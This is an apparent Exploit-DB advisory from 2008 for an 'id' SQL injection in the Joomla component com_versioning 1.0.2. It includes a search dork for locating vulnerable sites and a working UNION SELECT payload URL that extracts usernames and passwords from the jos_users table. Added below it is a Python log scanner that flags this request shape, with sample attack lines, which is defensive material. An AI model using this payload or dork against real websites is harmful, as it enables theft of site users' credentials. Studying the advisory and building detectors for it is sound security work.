Joomla! Component versioning 1.0.2 - 'id' SQL Injection

EDB-ID: 5989

Platform: PHP

Date: 2008-07-01


[+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

[+] Team           : DarkMatter Crew

[+] Crew website       : WwW.SykoPainKilla.CoM

[+] Author         : SpK & His0k4

[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com

[+] D0rk      : inurl:index.php?option=com_versioning



[+] Expl0iT :

http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--
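A defender's check for the request shape above, as an added example that is not part of the original advisory: it scans web access logs for com_versioning requests whose id is not a plain integer. The log format (Apache combined), the sample lines, the function names and the rule that a legitimate id is a non-negative integer are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jul/2008:10:00:01 +0000] "GET /index.php?option=com_versioning&task=edit&id=83 HTTP/1.1" 200 5120',
    # URL-encoded form of the request shape shown in the advisory (shortened)
    '203.0.113.9 - - [01/Jul/2008:10:00:05 +0000] "GET /index.php?option=com_versioning&task=edit&id=-83%20UNION%20SELECT%201,2%20FROM%20jos_users-- HTTP/1.1" 200 7340',
    # Same request logged with raw spaces, which breaks naive whitespace splitting
    '203.0.113.9 - - [01/Jul/2008:10:00:09 +0000] "GET /index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,2 FROM jos_users-- HTTP/1.1" 200 7001',
    '198.51.100.7 - - [01/Jul/2008:10:00:12 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 900',
]

# Greedy match up to the final " HTTP/x.y" so targets containing spaces stay whole.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*) HTTP/\d\.\d"')
# Assumption: a legitimate id is a non-negative decimal integer.
VALID_ID_RE = re.compile(r"\d+")


def bad_id(line):
    """Return the decoded id value if the line is a com_versioning request
    whose id is not a plain integer; otherwise return None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    query = urlsplit(match.group("target")).query
    params = parse_qs(query, keep_blank_values=True)  # decodes %20 and '+'
    if "com_versioning" not in params.get("option", []):
        return None
    for value in params.get("id", []):
        if not VALID_ID_RE.fullmatch(value.strip()):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_id) for every suspicious log line."""
    hits = []
    for line in lines:
        value = bad_id(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tsuspicious id={value!r}")
```

Casting id to an integer before it is used in the query removes the injection point this request relies on.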




side note:
<name>versioning</name>
<creationDate>11.14.2006</creationDate>
<author>Thomas Papin</author>
<copyright>
This component is released under the GNU/GPL License.
</copyright>
<authorEmail>thomas.papin@free.fr</authorEmail>
<authorUrl>www.joomprod.com</authorUrl>
<version>1.0.2</version>

# milw0rm.com [2008-07-01]